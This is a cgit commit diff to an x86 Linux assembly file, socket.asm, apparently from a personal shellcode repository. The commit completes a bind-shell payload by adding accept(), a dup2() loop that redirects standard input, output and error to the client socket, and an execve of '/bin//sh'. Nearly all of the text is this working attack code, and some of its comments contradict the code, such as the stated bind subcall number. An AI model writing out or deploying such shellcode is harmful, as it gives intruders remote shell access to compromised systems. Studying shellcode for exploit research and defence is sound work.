aboutsummaryrefslogtreecommitdiff
path: root/shellcode
diff options
context:
space:
mode:
Diffstat (limited to 'shellcode')
-rw-r--r--shellcode/socket.asm50
1 files changed, 45 insertions, 5 deletions
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index fe26659..76b8103 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -13,22 +13,24 @@ int 0x80 ; let the kernel do the stuff
; bind()
mov edx,eax ; move socket descriptor (returned by socket()) to edx
-xor eax,eax ; zero out eax again
+xor eax,eax
; sockaddr_in
-push eax ; in_addr = 0
-push word 0x11AA ; push tcp port
-push word 0x2 ; sa_family -> AF_INET = 0x02
+push eax ; sockaddr_in: in_addr = 0
+push word 0x11AA ; sockaddr_in: tcp port
+push word 0x2 ; sockaddr_in: sa_family -> AF_INET = 0x2
mov ecx,esp ; save stack pointer -> pointer to sockaddr struct
push 0x10 ; arg3: socklen -> addrlen
push ecx ; arg2: push pointer to sockaddr to the stack
push edx ; arg1: push sockfd
+; arg2
mov ecx,esp ; move stack pointer to reg (conform to socketcall)
+; arg1
mov ebx,0x02 ; set socket subcall to 0x03 (bind)
mov al,0x66 ; socketcall syscall
int 0x80 ; let the kernel do the stuff
; listen()
-xor eax,eax ; zero out eax
+xor eax,eax
push eax ; backlog
push edx ; sockfd
mov ecx,esp ; save stackptr
@@ -36,6 +38,44 @@ mov al,0x66 ; socketcall()
mov ebx,0x4 ; socketcall 0x4 -> listen()
int 0x80 ; kernel mode
+; accept()
+xor eax,eax
+push eax ; sockaddr: in_addr = 0
+push word ax ; sockaddr: tcp port = 0
+push word 0x2 ; sockaddr: sa_family -> AF_INET
+mov ecx,esp ; save stack pointer
+push 0x10 ; addrlen
+push esp ; pointer to sock addrlen
+push ecx ; push sockaddr_in
+push edx ; sockfd
+mov ecx,esp
+mov ebx,0x5
+mov al,0x66
+int 0x80
+
+; dup2()
+xor ecx,ecx ; zero out count register
+mov cl,0x3 ; loopcount
+mov ebx,eax ; sockfd of the client (see accept())
+dupes:
+xor eax,eax ; zero out eax
+mov al,63 ; dup2() syscall
+dec cl
+int 0x80
+inc cl
+loop dupes ; jump2label
+
+; exec()
+xor eax,eax
+xor ecx,ecx
+cdq
+push 0x68732f6e ; 'hs/n'
+push 0x69622f2f ; 'ib//'
+mov ebx,esp ; arg
+mov byte [esp + 8], al ; null-terminate the string
+mov al,0xb ; execve syscall
+int 0x80
+
; exit()
mov al,0x1 ; exit syscall
mov ebx,0x42 ; return code
Powered by cgit, Themed by Ted Yin.